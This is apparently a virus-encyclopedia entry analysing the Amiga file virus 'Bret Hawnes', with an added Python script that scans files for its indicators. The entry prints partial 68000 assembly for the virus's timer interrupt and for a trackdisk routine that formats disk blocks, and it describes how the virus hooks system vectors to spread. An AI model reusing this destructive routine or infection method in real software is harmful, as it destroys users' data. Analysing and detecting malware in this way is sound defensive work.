Introduction
Bret Hawnes is a virus written for the Commodore Amiga. It is a file virus.
Summary
- Writes itself to unprotected floppy disks while booting
- Stays resident in memory by using KickTagPtr
- Extends the startup-sequence of an inserted disk, writing its filename in the first line
- Has a total length of 2608 bytes
- Alters some operating-system routines:
  - OpenLibrary()-vector of exec.library
  - OpenWindow()-vector of intuition.library
  - $6C (Interrupt-Vector)
- Destroys disk blocks using the trackdisk.device
- It is not encrypted
Details
After it is executed, the virus copies itself to ChipRam location $7F000 without allocating this area. This can crash the Amiga if another program occupies this memory location.
The virus then makes itself resident by using the KickTag. When the Amiga is reset, the virus hooks the OpenLibrary()-vector of the exec.library.
The next time you boot with a clean disk, the virus is activated, since AmigaOS opens various libraries through the hooked OpenLibrary()-vector. The virus waits until AmigaOS opens the intuition.library (which also happens at boot time), then hooks the OpenWindow()-vector of this library and disables its OpenLibrary()-vector-hook in the exec.library.
AmigaDOS opens the default AmigaDOS window on each boot by calling OpenWindow() of the intuition.library. When this window is opened the virus gains control again, and this time it performs the following steps:
- Writes itself to the root folder of the disk under the filename 0xC0A0E0A0 [1].
- Alters the startup-sequence of the disk by writing the above filename as the first line, so the virus is activated again on the next boot.
- If this is the 10th disk infection, the virus activates a destructive routine which formats different disk blocks. After that, a graphical routine is activated that shows a virus text.
- If this is not the 10th disk infection, the virus hooks the $6C interrupt, which increases a counter. When this counter reaches a certain value (after approx. 20 minutes), a graphical routine is activated that shows a virus text.
- Then the virus disables the OpenWindow()-vector-hook by setting the vector back to the original ROM value.
This is the interrupt-routine, which activates the graphical-routine:
counter:
    addq.l #1,$7F37C          ; increment the tick counter
    cmpi.l #$EA60,$7F37C      ; $EA60 = 60000 -> 1/50sec * 60000 / 60 = 20 minutes
    beq.w show_text           ; limit reached: show the virus text
    (...)
This is the destruction-routine:
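destroy:
    move.l #$60400,$7F956     ; value for io_Offset
    move.l #$B,$7F94E         ; value for io_Command ($B = TD_FORMAT)
    move.l #$1B800,$7F952     ; value for io_Length
    bsr.w doio
    move.l #0,$7F956          ; io_Offset = 0 (start of the disk)
    move.l #$2C00,$7F952      ; io_Length = $2C00
    bsr.w doio
    move.l #9,$7F94E          ; io_Command = 9 (TD_MOTOR)
    move.l #0,$7F952          ; io_Length = 0 (motor off)
    bsr.w doio
    (...)
doio:
    movem.l d0-a6,-(sp)       ; save all registers
    movea.l 4.l,a6            ; a6 = ExecBase
    lea iostructure,a1        ; a1 = I/O request for the trackdisk.device
    move.w $7F950,$1C(a1)     ; io_Command (low word of the long at $7F94E)
    move.l $7F952,$24(a1)     ; io_Length
    move.l $7F956,$2C(a1)     ; io_Offset
    move.l $7F95E,$28(a1)     ; io_Data
    jsr -456(a6)              ; DoIO() of exec.library
    move.l $20(a1),$7F95A     ; store io_Actual
    movem.l (sp)+,d0-a6       ; restore all registers
    rts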
The graphical output of the virus, which is shown after 20 minutes or after destruction of the disk, is a blue screen with small white letters.
At the beginning of the virus-file you can read the following text:
00000000h: 60 00 00 18 42 52 45 54 20 48 41 57 4E 45 53 20 ; `...BRET HAWNES
00000010h: 50 52 4F 44 55 43 54 49 4F 4E 2C 79 00 00 00 04 ; PRODUCTION,y....
And at the end of the virus-file you can read:
000009b0h: FE D6 60 00 FA 02 55 20 4C 49 4B 45 20 4D 59 20 ; þÖ`.ú.U LIKE MY
000009c0h: 46 49 52 53 54 20 4C 49 4E 4B 56 49 52 55 53 20 ; FIRST LINKVIRUS
000009d0h: 3F 20 20 20 20 44 4F 4E 45 20 42 59 20 42 52 45 ; ?    DONE BY BRE
000009e0h: 54 20 48 41 57 4E 45 53 20 32 31 30 32 39 30 00 ; T HAWNES 210290.
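The texts, the length and the filename given above can be turned into a simple indicator check. The following is an added example, not part of the original description; the function names and sample inputs are constructed for illustration, and it assumes the filename is the four bytes C0 A0 E0 A0 (reading the trailing 1 as the footnote marker).

```python
from typing import List

# Indicators quoted on this page
HEADER_TEXT = b"BRET HAWNES PRODUCTION"       # text at the start of the virus file
TRAILER_TEXT = b"DONE BY BRET HAWNES 210290"  # text at the end of the virus file
HIDDEN_NAME = bytes.fromhex("C0A0E0A0")       # assumed filename bytes (see lead-in)
VIRUS_LENGTH = 2608                           # total length from the summary


def check_file(data: bytes) -> List[str]:
    """Return the page's file indicators that are present in a file's bytes."""
    findings = []
    if HEADER_TEXT in data:
        findings.append("header text")
    if TRAILER_TEXT in data:
        findings.append("trailer text")
    if len(data) == VIRUS_LENGTH:
        findings.append("length 2608")  # weak alone, useful with the texts
    return findings


def check_startup_sequence(data: bytes) -> List[str]:
    """Inspect only the first line, which is where the virus writes its name."""
    line = data.split(b"\n", 1)[0].rstrip(b"\r")
    findings = []
    if line.strip() == HIDDEN_NAME:
        findings.append("first line is the hidden filename C0 A0 E0 A0")
    elif any(b != 0x09 and (b < 0x20 or b > 0x7E) for b in line):
        # Heuristic: legitimate scripts may contain Latin-1 characters too
        findings.append("first line contains non-printable bytes")
    return findings


# Constructed, inert samples: only the marker bytes, zero padding in between
_head = bytes.fromhex("60000018") + HEADER_TEXT
_tail = TRAILER_TEXT + b"\x00"
SAMPLE_FILE = _head + bytes(VIRUS_LENGTH - len(_head) - len(_tail)) + _tail
SAMPLE_INFECTED = HIDDEN_NAME + b"\nLoadWB\nEndCLI\n"
SAMPLE_CLEAN = b"LoadWB\nEndCLI\n"

if __name__ == "__main__":
    print(check_file(SAMPLE_FILE))
    print(check_startup_sequence(SAMPLE_INFECTED))
    print(check_startup_sequence(SAMPLE_CLEAN))
```

Because the dir command does not show the file, the startup-sequence check is the more reliable of the two on a disk that is only inspected from the CLI.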
Clones and variants
[1] This filename appears invisible to AmigaDOS when the contents of a disk are listed with the CLI command dir.






